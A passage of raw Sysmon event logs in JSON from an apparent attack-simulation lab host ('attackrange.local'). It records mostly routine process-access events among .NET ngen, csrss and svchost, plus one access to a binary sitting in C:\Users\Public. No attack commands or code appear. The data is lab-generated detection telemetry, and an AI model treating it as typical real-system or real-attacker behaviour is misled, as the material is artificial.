C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:24.935","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1380-5F25-0000-0010E0BF0F00}","TargetProcessId":"3452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8589,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:24.951\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1380-5F25-0000-0010E0BF0F00}\r\nTargetProcessId: 3452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:24.951","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1380-5F25-0000-0010E0BF0F00}","TargetProcessId":"3452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8590,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:25.013\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-00105B230E00}\r\nTargetProcessId: 3952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:25.013","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-00105B230E00}","TargetProcessId":"3952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8591,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:25.013\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-00105B230E00}\r\nTargetProcessId: 3952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:25.013","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-00105B230E00}","TargetProcessId":"3952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8592,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:25.013\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-00105B230E00}\r\nTargetProcessId: 3952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:25.013","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-00105B230E00}","TargetProcessId":"3952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8593,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:25.060\r\nProcessGuid: {E2A3D6B1-1381-5F25-0000-0010BCC30F00}\r\nProcessId: 3952\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f70-0\\System.ServiceModel.ServiceMoniker40.dll\r\nCreationUtcTime: 2020-08-01 07:02:25.060","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:25.060","ProcessGuid":"{E2A3D6B1-1381-5F25-0000-0010BCC30F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f70-0\\System.ServiceModel.ServiceMoniker40.dll","CreationUtcTime":"2020-08-01 07:02:25.060","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8594,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:25.091\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1366-5F25-0000-0010947F0E00}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:25.091","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1366-5F25-0000-0010947F0E00}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8595,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:25.091\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1366-5F25-0000-0010947F0E00}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:25.091","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1366-5F25-0000-0010947F0E00}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8596,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:25.091\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1366-5F25-0000-0010947F0E00}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:25.091","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1366-5F25-0000-0010947F0E00}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8597,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:25.138\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files 